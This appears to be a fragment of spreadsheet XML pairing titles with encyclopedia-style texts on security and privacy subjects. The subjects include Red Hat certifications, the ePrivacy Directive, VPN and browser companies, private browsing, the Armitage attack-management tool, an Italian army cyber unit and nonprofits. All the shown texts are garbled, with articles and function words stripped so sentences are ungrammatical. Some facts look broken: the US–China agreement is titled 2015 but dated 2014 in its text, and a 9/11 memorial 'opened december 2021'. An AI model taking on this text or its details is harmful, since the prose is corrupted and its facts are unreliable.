    <t>hat, subsidiary specializing computer software, offers different level certification programs, specialize system administration. certifications validated webpage, expire years. certifications certified system administrator (rhcsa) rhcsa entry-level certification focuses competencies system administration, including installation configuration enterprise linux system attach live network running network services. achieve rhcsa certification student must pass ex200, 3-hour hands-on exam. minimum passing score exam possible points (70%). there prerequisite exam, recommends preparing exam taking courses system administration (rh124 rh134) previous experience.rhcsa launched 2002 certified technician (rhct). july 2009 30,000 rhcts. november 2010 renamed rhcsa. certified engineer (rhce) self-titled "the flagship" certification, rhce mid- advanced-level certification builds topics covered rhcsa certification include advanced topics security installing common enterprise networking (ip) services. achieve rhce certification, student must pass rhcsa exam, ex200, addition ex300, 3.5-hour hands-on exam. recommends preparing exam taking courses linux essentials (rh124), linux administration (rh134), linux networking security (rh254) previous experience. previous real-world experience also advised.rhce first certificate launched, 1999. july 2009 40,000 rhces. named hottest certification 2006 certcities.com. certified architect (rhca) self-titled "the capstone certificate", rhca complete certificate program, adding enterprise-level focus. there concentrations inside rhca candidate choose focus, however choosing required. focuses are: datacenter: skills tasks common on-premises datacenter cloud: skills tasks common cloud infrastructure devops: skills knowledge technologies practices accelerate process moving applications updates development build test processes production application development: skills enterprise application development, integration, architecture application platform: skills tasks common building managing tools applicationsrhca launched 2005. certified virtualization administrator (rhcva) rhcva certification focuses virtualization administration. achieve rhcva certification student must pass ex318, 3-hour hands-on exam. there prerequisite exam, recommends preparing exam taking respective course, rh318, obtaining rhcsa certification described above. exam also requires knowledge using installing microsoft windows operating systems.rhcva launched november 2009. jboss certified application administrator (jbcaa) jbcaa certification focuses managing jboss enterprise application platform. achieve jbcaa certification student must pass ex248, four-hour hands-on exam. there prerequisite exam, recommends preparing exam taking course jb248, four-day course jboss application administration.jbcaa launched september 2009. examination required certification also comptia linux+ linux professional institute certifications ubuntu professional certification references ethical hacking program further reading jang, michael. rhcsa/rhce linux certification study guide (rhel 1072. isbn 978-0-07-176565-7. tommasino, damian (2011). hands-on guide exams: rhcsa rhce cert guide manual (rhel 600. isbn 978-0321767950. ghori, asghar december 2012). certified system administrator engineer (rhel 640. isbn 978-1-467549400. external links certification program list courses</t>
  </si>
  <si>
    <t>Privacy and Electronic Communications Directive 2002</t>
  </si>
  <si>
    <t>privacy electronic communications directive 2002/58/ec privacy electronic communications, otherwise known eprivacy directive (epd), directive data protection privacy digital age. presents continuation earlier efforts, directly data protection directive. deals regulation number important issues confidentiality information, treatment traffic data, spam cookies. this directive amended directive 2009/136, introduces several changes, especially concerns cookies, subject prior consent. there interplays eprivacy regulation (epr) general data protection regulation (gdpr). some lawmakers hoped eprivacy regulation (epr) could come force time general data protection regulation (gdpr) 2018. way, would repeal eprivacy directive 2002/58/ec accompany gdpr regulating requirements consent cookies opt-out options. subject-matter scope electronic privacy directive drafted specifically address requirements digital technologies ease advance electronic communications services. directive complements data protection directive applies matters specifically covered directive. particular, subject directive "right privacy electronic communication sector" free movement data, communication equipment services. directive apply titles (second third pillars constituting european union). likewise, apply issues concerning public security defence, state security criminal law. interception data however covered data retention directive, prior annulment court justice european union. contrary data protection directive, specifically addresses individuals, article 1(2) makes clear eprivacy directive also applies legal persons. main provisions first general obligation directive provide security services. addressees providers electronic communications services. this obligation also includes duty inform subscribers whenever particular risk, virus malware attack.the second general obligation confidentiality information maintained. addressees member states, prohibit listening, tapping, storage kinds interception surveillance communication "related traffic", unless users given consent conditions article 15(1) fulfilled. data retention issues directive obliges providers services erase anonymise traffic data processed longer needed, unless conditions article fulfilled. retention allowed billing purposes long statute limitations allows payment lawfully pursued. data retained upon user's consent marketing value-added services. previous uses, data subject must informed long data processed. subscribers right non-itemised billing. likewise, users must able calling-line identification.where data relating location users traffic processed, article provides permitted data anonymised, users given consent, provision value-added services. like previous case, users must informed beforehand character information collected option out. unsolicited e-mail messages article prohibits email addresses marketing purposes. directive establishes opt-in regime, according unsolicited emails sent prior agreement recipient. natural legal person initially collects address data context sale product service, right commercial purposes provided customers prior opportunity reject communication initially collected subsequently. member states obligation ensure unsolicited communication prohibited, except circumstances given article categories emails communication general) also excluded scope prohibition. first exception existing customer relationships second marketing similar products services. sending unsolicited text messages, either form messages, push mail messages similar format designed consumer portable devices (mobile phones, pdas) also falls prohibition article cookies directive provision applicable cookies article 5(3). recital preamble recognises importance usefulness cookies functioning modern internet directly relates article 5(3) recital also warns danger instruments present privacy. change affect types cookies; deemed "strictly necessary delivery service requested user", example, cookies track contents user's shopping cart online shopping service, exempted. article technology neutral, naming specific technological means used store data, applies information website causes stored user's browser. this reflects legislator's desire leave regime directive open future technological developments. addressees obligation member states, must ensure electronic communications networks store information visitor's browser allowed user provided "clear comprehensive information", accordance data protection directive, purposes storage access information; given consent. regime set-up described opt-in, effectively meaning consumer must give consent cookies form data stored browser. regulations allow consent signified future browser settings, introduced must capable presenting enough information user give informed consent indicating target website consent obtained. initial consent carried repeated content requests website. directive give guidelines constitute opt-out, requires cookies, "strictly necessary delivery service requested user" placed without user consent. literature full text directive guidance uk's guidance french cnil (translated english) article data protection working party opinion 2/2010 article data protection working party opinion 16/2011 history decision making spam: asscher, hoogcarspel, s.a, regulating spam: european perspective adoption eprivacy directive (t.m.c. asser press 2006) edwards, "articles ecd; privacy electronics communications directive 2002" edwards, (ed.) legal framework e-commerce europe (hart 2005) references</t>
  </si>
  <si>
    <t>Private Internet Access</t>
  </si>
  <si>
    <t>private internet access (pia) personal service allows users connect multiple locations. 2018, former mark karpelès named chief technology officer pia's parent company, london trust media. november 2019, private internet access acquired kape technologies. company private internet access (and parent company, london trust media, inc.) kim. company founded andrew lee. started company wanted prevent internet relay chat revealing addresses.on november 2019, private internet access announced would merged kape technologies, operates three competing services, cyberghost, expressvpn zenmate. some users objected acquisition, kape (under former name, crossrider) previously developed browser toolbars bundled potentially unwanted programs. history founded 2010, private internet access formed parent company london trust media entrepreneur andrew lee. company formed lee’s interest take privacy mainstream. goal company create “next vpn” open-sourced client software code everyone use. during acquisition kape technologies, assure users privacy security remain company’s priority continue work kape’s umbrella. however, kape technologies history, good amount faith lost.after merging kape technologies, private internet access became many privacy software products offered corporation. along private internet access, kape also offers cyberghost, intego, webselenese restoro. previously crossrider, uk-based company, kape technologies changed name 2018 order type rebranding "escape strong association past activities company" issues previous image associated traffic manipulation. after purchasing various services, kape technologies purchased private internet access order "aggressively expand footprint north america". reception 2021 review techradar, private internet access given four five star rating described likeable gives plenty money". according review, notable features include removing restrictions streaming services netflix, amazon prime video disney+. also received positive review tom's guide november 2021, highlighted service's kill switch feature, compatibility torrents, logging" policy. tom's guide found pia's speeds average among services, stated third-party audit would improve service's credibility.in december 2021 test, pcmag determined reduced "download upload speeds 10.9% 19.4%, respectively", smallest speed reduction among vpns tested publication time. pcmag praised pia's server selection, connection limit devices), app, noted service undergone third-party audit.in 2022 (private internet access) reviewed geeksadvice market leaders 30,000. servers world-wide countries). offers 100% open-source apps. torrent-friendly, provides socks5 proxy feature, also port forwarding function. also comparison virtual private network services references external links official website</t>
  </si>
  <si>
    <t>Private browsing</t>
  </si>
  <si>
    <t>private browsing privacy feature browsers. when operating mode, browser creates temporary session isolated browser's main session user data. browsing history saved, local data associated session, cookies, cache, cleared session closed. these modes designed primarily prevent data history associated particular browsing session persisting device, discovered another user device. development, used quickly test displaying pages appear first-time visitors. private browsing modes necessarily protect users tracked websites internet service provider (isp). furthermore, possibility identifiable traces activity could leaked private browsing sessions means operating system, security flaws browser, malicious browser extensions, found certain html5 apis used detect presence private browsing modes differences behavior. this usually people mistake private browsing vpn. history apple's safari browser first major browsers include feature. feature since adopted browsers, popularization term 2008 mainstream news outlets computing websites discussing beta versions internet explorer adobe flash player 10.1 began honoring browser settings private browsing status regards storage local shared objects. uses noted uses private browsing modes include hiding undesirable content browsing history (such visits adult-oriented websites), performing searches algorithmically influenced prior browsing habits user's recorded interests, providing "clean" temporary session guest user (such using public computer), using websites multiple accounts simultaneously. private browsing also used means circumvent metered paywalls websites.in survey search engine duckduckgo, participants declined respond (leading researcher elie bursztein note "surveys clearly best approach understand people using private browsing mode embarrassment factor"), listed shopping primary private browsing modes.a study mozilla foundation found sessions lasted minutes, periods activation increased, usually around a.m. p.m., p.m., p.m. p.m., minor peak hour midnight. support popular browsers private browsing known different names different browsers. security common misconception private browsing modes protect users tracked websites internet service provider (isp). such entities still information addresses user accounts uniquely identify users. some browsers partly addressed shortcoming offering additional privacy features automatically enabled using private browsing mode, firefox's "tracking protection" feature control trackers (which since rolled larger "content blocking" function extended outside private browsing mode), opera offering in-house service embedded within browser.brazilian researchers published results project applied forensic techniques (namely foremost data carving tool strings program) extract information users browsing activities internet explorer firefox browsers private mode enabled. they able collect enough data identify pages visited even partially reconstruct them. this research later extended include chrome safari browsers. gathered data proved browsers' private mode implementations able fully hide users' browsing activities browsers private mode leave traces activities caching structures files related paging process operating system.another independent security analysis, performed group researchers newcastle university reported range potential security vulnerabilities implementation private modes across chrome, firefox, internet explorer, safari, including that; browser extensions could still record history active private mode. although chrome firefox since required extensions enabled opt-in basis private browsing modes, installed extension normal mode could learn user's activities private mode measuring usage shared computing resources. data erasure browser alone found insufficient. example, records visited websites private session retained memory long time even private session closed. addition, visited website records usually kept operating system local cache. furthermore, modified timestamps certain profile files saved disk reveal private mode previously turned turned software bugs present browsers found seriously degrade security private mode. example, earlier versions safari, browser retained private browsing history records browser program closed normally (e.g., result crash), user acted bookmark within private mode. depending whether session private normal mode, browsers typically exhibit different user interfaces traffic characteristics. this allows remote website tell user currently private mode, example, checking color hyperlinks measuring time writing cookies.bugs security vulnerabilities extensions also leak personally identifiable data private mode.implementations html5 filesystem used detect users private mode. google chrome, filesystem available incognito mode prior version prevent circumvention paywall policies evasion tracking scripts used monetize traffic, number websites including york times used behavior block access users private browsing mode, requiring subscribe chrome allows filesystem used incognito mode; explaining change, google argued ability detect incognito mode infringes users' privacy. however, later discovered disk space quotas differed normal incognito modes, providing another means detect incognito users. despite statements otherwise google, patched. scripts also developed detect private browsing mode browsers, firefox. also internet privacy browser dark references external links "how turn private incognito browsing". wikihow. retrieved july 2018.</t>
  </si>
  <si>
    <t>PenTest+</t>
  </si>
  <si>
    <t>Cliqz</t>
  </si>
  <si>
    <t>cliqz privacy-oriented browser search engine developed cliqz gmbh majority-owned hubert burda media. available desktop mobile browser well extension firefox itself. composition fork firefox browser privacy-oriented changes, among crowdsourced anti-tracking mechanism in-house search engine embedded within browser, utilizing index pages produce suggestions within address dropdown menu rather separate pages. browser's developers argued privacy-focused search engines still pass user's address third-party search providers. history august 2016, mozilla, developer firefox, made minority investment cliqz. cliqz planned eventually monetize software program known cliqz offers, would deliver sponsored offers users based interests browsing history. however, recommendations would processed locally based remote repository offers, personally identifiable data sent remote servers.on february 2017, cliqz international gmbh, wholly-owned subsidiary cliqz gmbh, acquired privacy-oriented browser extension ghostery.on april 2020, cliqz announced shut browser search engine. subsequently, search engine called tailcat acquired brave.as march 2021, browser called ghostery dawn reported development. ghostery dawn available public download october 2021. integration firefox october 2017, mozilla announced test approximately users downloading firefox germany would receive version cliqz software included. feature provided recommendations directly browser's search field. recommendations included news, weather, sports, websites based user's browsing history activities. press release noted "users receive version firefox cliqz browsing activity sent cliqz servers, including urls pages visit," "cliqz uses several techniques attempt remove sensitive information browsing data sent firefox."according firefox support website, version firefox collects sends data cliqz corporation including text typed address bar, queries search engines, information visited webpages interactions including mouse movement, scrolling, amount time spent; user's interactions user interface cliqz software. interaction data collected sent mozilla corporation includes among things, counts visits search engine pages, search engines used, cliqz identifier. data collection enabled default; users must actively opt-out wish data transmitted. 2018, cliqz released version browser called lumen. natively leveraged cliqz's search engine, human web, supported ad-blocking privacy features, like optional built-in access countries. network owned managed part partnership foxyproxy. lumen financially profitable, discontinued 2020 changing directors cliqz. references external links official website</t>
  </si>
  <si>
    <t>2015 United States–China Cybersecurity Agreement</t>
  </si>
  <si>
    <t>2014 united states-china cybersecurity agreement executive agreement united states people's republic china. agreement covers several areas cybersecurity policy, including information sharing mechanisms establishing neither country support cyber-enabled intellectual property theft. agreement announced joint press conference attended u.s. president barack obama chinese general secretary jinping located white house lawn september 2015.the agreement called ineffective trump administration others. also convention cybercrime references</t>
  </si>
  <si>
    <t>Zimperium</t>
  </si>
  <si>
    <t>zimperium, inc. privately owned mobile security company based united states headquartered dallas, texas. zimperium provides mobile security platform purpose-built enterprise environments. history zimperium, ltd. founded 2010 chairman itzhak avraham. 2011, elia yehuda, joined co-founder. 2013, assets zimperium, ltd. acquired zimperium, inc., company incorporated delaware. 2014, zimperium, inc. released zips android (intrusion prevention system), smartphone software uses machine learning monitor user habits detect prevent possible phone hacking. 2015, zimperium, inc. researched developed security systems group software bugs affect series android operating systems called stagefright (bug).in 2016, company partnered blackberry. partnership consisted integration zips zimperium enhancing mobile security android platforms. zimperium, inc. raised $60m private investors including samsung, telstra, sierra ventures, softbank warburg pincus. company partnered several technology companies including softbank group, deutsche telekom, telstra, smartone, oracle, microsoft, trellix, sentinelone, ivanti,in july 2021, zimperium broadened portfolio mobile application protection solutions acquiring whitecryption, leading provider advanced application shielding cryptographic protection. zimperium acquired whitecryption investment group intertrust, pioneer trusted computing digital rights management (drm) technology. march 2022, zimperium acquired approximately $525 million liberty strategic capital, private equity firm founded former u.s. secretary treasury steven mnuchin. with investment, liberty strategic capital acquired controlling interest zimperium secretary mnuchin chaired company's board directors. softbank corp., investor zimperium since 2017, continued minority investor. also stagefright (bug) references</t>
  </si>
  <si>
    <t>Pelco</t>
  </si>
  <si>
    <t>pelco incorporated u.s.-based security surveillance technologies company, founded 1957 headquartered fresno, california. pelco provider security cameras, recording management systems, software, services. pelco products found outdoor environments, cities, hospitals, airports, seaports, gaming facilities, retail, office environments, schools, universities. history pelco sales founded 1957 hawthorne, california e.l. heinrich. heinrich created pelco sales side project already successful mechanical aviation business. pelco sales' first product line consisted pan-tilt devices joysticks designed remotely control position television cameras. demand pelco sales' products grew rapidly, resulting heinrich's decision abandon aviation focus camera technologies. company moved gardena, california, later fresno, california, provide adequate workspace product production. june 1987, heinrich sold pelco sales local investor david mcdonald shortly approving plans 80,000 square foot facility clovis, california. mcdonald truncated name pelco, event commonly referred beginning "new" pelco. company continued expand, reaching distribution countries. 2000 small business administration awarded company small business year award.after events 9/11 company financed construction california 9/11 memorial corporate headquarters. memorial opened december 2021 less three months attacks includes objects recovered ground zero, educational exhibits, memorials names victims. 2019 memorial expanded replicas pentagon world trade centers.in 2007, french electrical equipment manufacturer schneider electric purchased pelco us$1.22 billion effort enhance building automation business. schneider electric's ownership pelco came pelco acquired transom capital group, private equity firm based angeles, 2019. august 2020, motorola solutions announced acquired pelco us$110 million cash.pelco's security surveillance systems notably protect buckingham palace, sydney opera house statue liberty. pelco claims million installations worldwide. technologies pelco produces security surveillance products known tilt zoom (ptz) technologies, multiple camera tracking moving objects, tracking security breaches. additionally company patents assigned company. industries commercial retail industry technology government military correctional facilities city traffic healthcare gaming airports seaports education references</t>
  </si>
  <si>
    <t>Ars Electronica</t>
  </si>
  <si>
    <t>electronica linz gmbh austrian cultural, educational scientific institute active field media art, founded linz 1979. based electronica center (aec), houses museum future, city linz. electronica's activities focus interlinkages art, technology society. runs annual festival, manages multidisciplinary media arts facility known futurelab. also confers prix electronica awards. history electronica began first festival september 1979. founders hannes leopoldseder, hubert bognermayr, herbert franke, ulrich rützel. festival held biennially first, annually since 1986. prix electronica inaugurated 1987 awarded every year since then. electronica linz gmbh incorporated limited company 1995. electronica center, together futurelab, opened 1996, remodeled 2009. funding provided city linz, province upper austria republic austria, addition private partners. since 2014, organization headed artistic director gerfried stocker financial director diethard schwarzmair. museum exhibits called media loft, mainly used coffee house museum. also rented meetings events. occasionally used studio newscast local branch austrian national organization orf. specialty media loft marvelous view nibelungenbrücke main place linz side danube functions background newscasts. second floor people interact exhibits. there musicbottles containing different types music pingpongplus table tennis game desk virtual water surface. first floor displays world hidden eyes. "hidden worlds" various machines translating voice words virtual symbols colors everyday life articles moved screen touched. little room first ground floor main attractions offered. flight simulator "humphrey" uses virtual reality goggles give users simulated view flight person taking trip connected computer cables fixed body. possible everywhere movements hands, feet, landscape visitor raises head looks down. entrance so-called "login gateway" museum ground floor leads newcomer directly telegarden, robot looking flower patch. every ticket provided code gives information time visitor entered museum. after visit, ticket computer near exit gives statistic information things happened world span stay aec. list printed gives information many people died born time many accidents caused drunken drivers. last floor called virtual reality found basement building. cave another attraction museum. cube meters side length used screen project virtual world. there always groups dive world physical laws meaning. additionally, spectacles give impression bodyful environment. museum 2009–present electronica center, designed treusch architecture gmbh, opened doors january 2009 roughly years construction work approximate cost million euros. 3000 square meters exhibitions, research development, workshops conferences, catering another 1000 public space various types events. consists original building, "twin-tower", main exhibition hall called main gallery space electronica futurelab. whole building covered 5000-square-meter glass skin consists 1100 glass panels. each panel equipped allows change color. therefore, whole building acts giant display. artists create visualizations shown various occasions, especially electronica festival. restaurant located third floor building called cubus, referring building's cubic shape. museum exhibits with building came thematic orientation inside electronica. life sciences, global developments (e.g. climate change, population growth, environmental pollution) exploration universe view various topics. museum separated following areas: main gallery main gallery approximately 1000 square meters houses main exhibition called views humankind, focuses topics like biotechnology, robotics, rapid prototyping human body. separated following four so-called "labs": brain-lab focuses human brain, perception advances medicine. bio-lab focuses biotechnology applications. fab-lab deals possibilities offered printers rapid prototyping. robo-lab deals robotica well different prothetic systems.main gallery contains special area children thematically connected main exhibition. city city focuses global developments caused humankind, like growth population extraction natural resources. those global developments connected possible local reactions, visualized interactive city information system called sim-linz. artists, creators, engineers this area temporary exhibitions first second floor original building focuses interdisciplinary aspects electronica contributors. deep space deep space multifunctional presentation room offers wide range possibilities. consists walls (front floor) dimensions meters serve screens eight galaxy nh-12 projectors barco. projects range high-resolution videos scientific (3d) visualizations like flight solar system whole known universe artistic projects. futurelab building holds electronica futurelab, place researching trying cyberarts technologies. also prix electronica, yearly award ceremony given electronica cyberarts festival. since 2004, awards prix electronica brings young innovator team innovators futurelab summer develop budding idea technology electronic media. festival annual electronica festival gathering artists, scientists technologists, intended setting experimentation, evaluation reinvention". festival always exerted public presence linz, mounting large-scale open-air projects holding lectures, discussions workshops wide range public venues.: each year festival devoted specific theme. festival 2014, theme "c... what takes change", i.e. ways social change innovation promoted. attracted participants 85,000 visitors. features 2014 festival device form concept art, device described rebellion form, taking everyday objects inverting tell something different". among examples exhibited 2014 festival were: "otamatone" musical instrument shaped like musical note. "food simulator", pressure sensor user's mouth simulates sensation chewing food. "lenticular bicycle" fashioned bicycle screen carousel mounted handlebars, known "sustainable cinema created scott hessels. robot performs street begging, made recycled computer parts, voice robotic hands. "touchy", "human camera", devised hong kong-based artist eric suiss. smart atoms (spaxels) version called "smart atoms: spaxels version" developed electronica futurelab shown 2014 festival. prix electronica prix electronica annual award made several categories, "honoring creativity innovativeness digital media". award winners selected five-person international expert jury, propose candidates. prize awarded individuals teams organizations, awarded specific work another form innovation. grover (2008) described top-ranking award, golden nica, "the oscar digital art".: prize first awarded 1987, several changes categories since then. 2014, 2,703 entries countries. entries remain display online archive, prix electronica showcase, containing 55,000 items. award categories awards golden nica (worth 10,000 euros), awards distinction, honorary mentions made following categories: computer animation film (first presented 1987) create your world (first presented 1998) visionary pioneers media interactive digital music sound hybrid (first presented 2007) digital communities (first presented 2004) artificial intelligence life (first presented 2019) note: there also grant scheme honor support ideas exceptional promise. known "[the next idea] voestalpine technology grant". some notable award winners 1987: "luxo jr.", dir. john lasseter pixar (golden nica computer animation). 1990: "videoplace", myron krueger (golden nica interactive art): 1994: "jurassic park", dennis muren, mark dippé steve williams (golden nica computer animation) 1999: "the difference engine #3", lynn hershman (golden nica interactive art): 2004: wikipedia (golden nica– digital communities) 2005: processing, programming language environment designed electronic arts (golden nica vision): 64–65 2007: symbiotica, university western australia science collaborative research laboratory (golden nica hybrid art) 2008: reactable sergi jordà others (golden nica digital music) 2009: wikileaks (award distinction digital communities) electronica center center housed modern complex buildings danube. acts electronica's permanent base showcase. majority space used public exhibitions events, emphasis interactivity participation. major themes life sciences, environmental issues, preparation impending technological developments likely impacts society. there also provision conferences, workshops, r&amp;d. center enhanced expanded 2009, coincident linz's term european capital culture. most-visited museum linz. electronica futurelab futurelab, housed electronica center, center expertise multidisciplinary research development cyberarts technologies. staffed permanent team members, offers residencies established emerging artists researchers. futurelab produced infrastructure content center festival. more recently engaged art&amp;science projects universities private sector. spaxels spaxels ("space pixels") shown publicly world premiere 2012 electronica futurelab. spaxels single elements form drone display. automatically controlled drones fitted leds spaxels), formation create apparent three-dimensional objects night sky. spaxel ref. wiktionary comment trent nathaniel grover included appendix electronica book dream techno-shaman (2008). describes institute's activities unique platform exploring, discussing, tracking, analyzing interrelation art, technology, society".: such work, argues, affirms place human center techno-cultural processes, "beneficiaries, victims, and, all, creators appliers technology".: noting rapid pace technological innovation profound implications culture society, presents role electronica working integrate developments technology society benefit all, contrasts perspective modernist call "art art's sake".: grover concludes hoping electronica "will able maintain ongoing quest innovation expansion benefit involve integration art, technology, society".: 67–68 publications grover (2008) described published work electronica compelling snapshot codependent technological artistic development expansive lasting social cultural impact.": cyberarts .net, interactive art, computer animation/visual effects, computer music, u19/cybergeneration. edition (german english edition). published springer (1998). isbn 9783211831359. electronica: facing future: survey decades (electronic culture: history, theory, practice). published press (1999). isbn 9780262041768. digital avant-garde: celebrating years electronica. published electronica, linz (2004) electronica 2008: cultural economy limits intellectual property. published hatje cantz (2008). isbn 9783775722247. electronica 2013, edited hannes leopoldseder, christine schöpf, gerfried stocker. published hatje cantz(2014). isbn 9783775736305. gallery also list electronic music festivals computer digital electronic cyberarts cyberarts international technica references bibliography uffelen, chris. contemporary museums architecture, history, collections, braun publishing, 2010, isbn 978-3-03768-067-4, pages 144-145. external links official website media loft (march 2007) rejected competition entry official barco site</t>
  </si>
  <si>
    <t>Art Bowker</t>
  </si>
  <si>
    <t>bowker (born 1961 ohio), author cybercrime specialist corrections (pretrial, probation, parole). first book, cybercrime handbook community corrections: managing risk 21st century, describes process supervising cyber-offenders. bowker cowrote second book, investigating internet crimes, edition: introduction solving crimes cyberspace todd shipley. second book provides step-by-step instructions investigating internet crimes, including locating, interpreting, understanding, collecting, documenting online electronic evidence benefit investigations. career bowker interviewed crimcast american hero's radio. bowker lifetime member high technology crime investigation association (htcia), served international president organization 2008. written cybercrime articles appeared enforcement bulletin, federal probation, american probation parole association's perspectives, numerous publications. also writes regular blog called three c's: computers, crime, corrections.on january 2013, bowker awarded appa houston state university award, work promoting awareness knowledge cybercrime tools combat crimes field community corrections.on november 2013, recognized federal probation pretrial officers association (fppoa) honor, richard doyle award, made significant achievement contribution federal probation pretrial services system broader field corrections. additionally, bowker received thomas gahl, line officer year award (great lakes region award), named honor u.s. probation officer killed line duty. both awards centered contributions efforts managing cybercrime risk.on august 2016, recognized high technology crime investigation association htcia lifetime achievement award, annual recognition given individual least seven years membership, made significant contributions htcia goals. some specific factors considered bestowing award include evidence advancing field computer investigations prevention high tech crimes education and/or development tool(s) technique(s) participation chapter international officer. references external links three (computers, crime, corrections) blog</t>
  </si>
  <si>
    <t>Closed-circuit television</t>
  </si>
  <si>
    <t>Penetration testing</t>
  </si>
  <si>
    <t>Army Signal Command Cybernetic Security Unit</t>
  </si>
  <si>
    <t>army signal command cybernetic security unit (italian: reparto sicurezza cibernetica comando trasmissioni dell’esercito) cyber warfare unit italian army. history initial formation team army signal command cybernetic security unit established september 2018. cybernetic security unit established april 2019 and, june 2019, unit reached initial operational capability.: june 2020, cybernetic security unit reached full operational capability. mission cybernetic security unit performs: cyber defence, together task force theater; information research, support g2/j2 cells; cyber command staff forensic operations support personnel, future operations logistics cells, planning cybernetic military operations traditional military operations effects cyberspace; other cyber operations, according assigned tasks missions.the cybernetic security unit tasked performing cyber operations related defence networks command-and-control systems, operational technology, protection critical infrastructures platforms weapon systems disruptive technology.the cybernetic security unit operates network operations command joint command) alongside joint telecommunications school. cybernetic security unit personnel also operates within cyber deployed operational units staff supported command. organisation according defence undersecretary angelo tofalo, army signal command cybernetic security unit framed command signals commander. unit, battalion level, consists cybernetic security companies training innovation section. emblem coat arms army signal command cybernetic security unit depicts janus bifrons.the badge enameled metal, shape samnite shield, silver-blue edge. middle, light blue background, janus (parted pale) charged: first partition human forehead cornflower blue colour, second cybernetic forehead covered dark blue electronic circuit tracks. 5-pointed gold star appears base janus.all elements badge placed light blue background, symbol communication emblem loyalty. elements make badge represented shades blue, score represents cybernetic front janus covered veins similar traces electronic printed circuit, symbol high technological level unit. also comando interforze operazioni cibernetiche list cyber warfare forces army signal command (italy) references</t>
  </si>
  <si>
    <t>Armitage (computing)</t>
  </si>
  <si>
    <t>armitage graphical cyber attack management tool metasploit project visualizes targets recommends exploits. free open source network security tool notable contributions team collaboration allowing for: shared sessions, data, communication single metasploit instance. armitage written supported raphael mudge. history armitage front-end metasploit framework developed raphael mudge goal helping security professionals better understand hacking help realize power metasploit. originally made cyber defense exercises, since expanded user base penetration testers. features armitage scriptable team collaboration tool built metasploit framework. through armitage, user launch scans exploits, exploit recommendations, advanced features metasploit framework's meterpreter. references external links official website cobalt strike (strategic cyber llc)</t>
  </si>
  <si>
    <t>Nonprofit organization</t>
  </si>
  <si>
    <t>nonprofit organization (npo), also known non-business entity, not-for-profit organization, nonprofit institution, legal entity organized operated collective, public social benefit, contrast entity operates business aiming generate profit owners. nonprofit subject non-distribution constraint: revenues exceed expenses must committed organization's purpose, taken private parties. array organizations nonprofit, including political organizations, schools, business associations, churches, social clubs, consumer cooperatives. nonprofit entities seek approval governments tax-exempt, also qualify receive tax-deductible contributions, entity incorporate nonprofit entity without securing tax-exempt status. aspects nonprofits accountability, trustworthiness, honesty, openness every person invested time, money, faith organization. nonprofit organizations accountable donors, founders, volunteers, program recipients, public community. theoretically, nonprofit seeks finance operations donations, public confidence factor amount money nonprofit organization able raise. supposedly, nonprofits focus mission, public confidence have. this result money organization. activities nonprofit partaking help build public's confidence nonprofits, well ethical standards practices are. united states statistics according national center charitable statistics (nccs), million nonprofit organizations registered united states, including public charities, private foundations, nonprofit organizations. private charitable contributions increased fourth consecutive year 2017 (since 2014), estimated $410.02 billion. contributions, religious organizations received 30.9%, education organizations received 14.3%, human services organizations received 12.1%. between september 2010 september 2014, approximately 25.3% americans volunteered nonprofit. nonprofit not-for-profit nonprofit not-for-profit terms used similarly, mean thing. nonprofit organizations typically operate loss rely heavily donors continue operations. not-for-profits operate small margins 3-4% proceeds margins reinvest company. united states, nonprofits not-for-profits tax-exempt publication 557. although tax-exempt, organization faces different code requirements. nonprofit tax-exempt 501(c)(3) requirements either religious, charitable, educational based organization influence state federal legislation. not-for-profits tax-exempt 501(c)(7) requirements organization pleasure, recreation, another nonprofit purpose.nonprofits either member-serving community-serving. member-serving nonprofit organizations create benefit members organization include limited credit unions, sports clubs, advocacy groups. community-serving nonprofit organizations focus providing services community either globally locally. community-serving nonprofits include organizations deliver development programs, medical research, education, health services. possible nonprofit member-serving community-serving. mechanism money-raising nonprofit organisations driven generating profit, must bring enough income pursue social goals. nonprofits able raise money different ways. this includes income donations individual donors foundations; sponsorship corporations; government funding; programs, services merchandise sales, investments. each unique source income works best them. with increase npo's within last decade, organizations adopted competitive advantages create revenue remain financially stable. donations private individuals organizations change year government grants diminished. with changes funding year year, many nonprofit organizations moving toward increasing diversity funding sources. example, many nonprofits relied government grants started fundraising efforts appeal individual donors. management common misconception nonprofits completely volunteers. most nonprofits staff work company, possibly using volunteers perform nonprofit's services direction paid staff. nonprofits must careful balance salaries paid staff money paid provide services nonprofit's beneficiaries. organizations whose salary expenses high relative program expenses face regulatory scrutiny.a second misconception nonprofit organizations make profit. although goal nonprofits specifically maximize profits, still operate fiscally responsible business. they must manage income (both grants donations income services) expenses remain fiscally viable entity. nonprofits responsibility focusing professional, financially responsible, replacing self-interest profit motive mission motive.though nonprofits managed differently for-profit businesses, felt pressure businesslike. combat private public business growth public service industry, nonprofits modeled business management mission, shifting raison d’être establish sustainability growth.setting effective missions successful management nonprofit organizations. there three important conditions effective mission: opportunity, competence, commitment.one managing sustainability nonprofit organizations establish strong relations donor groups. this requires donor marketing strategy, something many nonprofits lack. functions npos wide diversity structures purposes. legal classification, are, nevertheless, elements importance: management provisions accountability auditing provisions provisory amendment statutes articles incorporation provisions dissolution entity statuses corporate private donors status founders.some must jurisdictions least) expressed organization's charter establishment constitution. others provided supervising authority particular jurisdiction. while affiliations affect legal status, taken consideration legal proceedings indication purpose. most countries laws regulate establishment management npos require compliance corporate governance regimes. most larger organizations required publish financial reports detailing income expenditure publicly. many aspects, similar corporate business entities though often significant differences. both not-for-profit for-profit corporate entities must board members, steering-committee members, trustees organization fiduciary duty loyalty trust. notable exception involves churches, often required disclose finances anyone, including church members. formation structure united states, nonprofit organizations formed filing bylaws articles incorporation state expect operate. incorporation creates legal entity enabling organization treated distinct body (corporation) enter business dealings, form contracts, property individuals for-profit corporations can. nonprofits members, many not. nonprofit also trust association members. organization controlled members elect board directors, board governors board trustees. nonprofit delegate structure allow representation groups corporations members. alternatively, non-membership organization board directors elect successors. major types nonprofit organization membership board-only. membership organization elects board regular meetings power amend bylaws. board-only organization typically self-selected board membership whose powers limited delegated board. board-only organization's bylaws even state organization membership, although organization's literature refer donors service recipients 'members'; examples organizations fairvote national organization reform marijuana laws. model nonprofit corporation imposes many complexities requirements membership decision-making. accordingly, many organizations, wikimedia foundation, formed board-only structures. national association parliamentarians generated concerns implications trend future openness, accountability, understanding public concerns nonprofit organizations. specifically, note nonprofit organizations, unlike business corporations, subject market discipline products shareholder discipline capital; therefore, without membership control major decisions election board, inherent safeguards abuse. rebuttal might nonprofit organizations grow seek larger donations, degree scrutiny increases, including expectations audited financial statements. rebuttal might npos constrained, choice legal structure, financial benefit distribution profit members directors concerned. exemption many countries, 